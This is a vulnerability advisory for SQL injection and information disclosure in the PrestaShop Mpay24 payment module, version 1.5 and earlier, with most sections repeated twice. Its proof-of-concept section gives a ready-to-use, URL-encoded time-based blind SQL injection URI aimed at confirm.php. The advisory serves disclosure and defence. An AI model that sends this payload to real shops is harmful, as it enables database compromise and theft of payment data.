PrestaShop Mpay24 Payment Module Information Disclosure and SQL Injection Vulnerabilities
BID:69560
CVE-2014-2008 | CVE-2014-2009 |Info
PrestaShop Mpay24 Payment Module Information Disclosure and SQL Injection Vulnerabilities
| Bugtraq ID: | 69560 |
| Class: | Input Validation Error |
| CVE: |
CVE-2014-2008 CVE-2014-2009 |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 03 2014 12:00AM |
| Updated: | Sep 03 2014 12:00AM |
| Credit: | Eldar Marcussen |
| Vulnerable: | |
| Not Vulnerable: | |
Discussion
PrestaShop Mpay24 Payment Module Information Disclosure and SQL Injection Vulnerabilities
Mpay24 Payment Module is prone to an information-disclosure vulnerability and an SQL-injection vulnerability.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database and gain access to sensitive information. Other attacks are also possible.
Mpay24 Payment Module 1.5 and prior are vulnerable.
Mpay24 Payment Module is prone to an information-disclosure vulnerability and an SQL-injection vulnerability.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database and gain access to sensitive information. Other attacks are also possible.
Mpay24 Payment Module 1.5 and prior are vulnerable.
Exploit / POC
PrestaShop Mpay24 Payment Module Information Disclosure and SQL Injection Vulnerabilities
Attackers can use a browser to exploit these issues.
The following example URI is available:
http://www.example.com/path/modules/mpay24/confirm.php?MPAYTID=1&STATUS=bbb&TID=a%27%20or%20%27a%27%20in%20%28select%20IF%28SUBSTR%28@@version,1,1%29=5,BENCHMARK%281000000,SHA1%280xDEADBEEF%29%29,%20false%29%29;%20--+
Attackers can use a browser to exploit these issues.
The following example URI is available:
http://www.example.com/path/modules/mpay24/confirm.php?MPAYTID=1&STATUS=bbb&TID=a%27%20or%20%27a%27%20in%20%28select%20IF%28SUBSTR%28@@version,1,1%29=5,BENCHMARK%281000000,SHA1%280xDEADBEEF%29%29,%20false%29%29;%20--+
Solution / Fix
PrestaShop Mpay24 Payment Module Information Disclosure and SQL Injection Vulnerabilities
Solution:
Reportedly, the issue is fixed; however, Symantec has not confirmed this. Please contact the vendor for more information.
Solution:
Reportedly, the issue is fixed; however, Symantec has not confirmed this. Please contact the vendor for more information.
References
PrestaShop Mpay24 Payment Module Information Disclosure and SQL Injection Vulnerabilities
References:
References:
- PrestaShop Homepage (PrestaShop)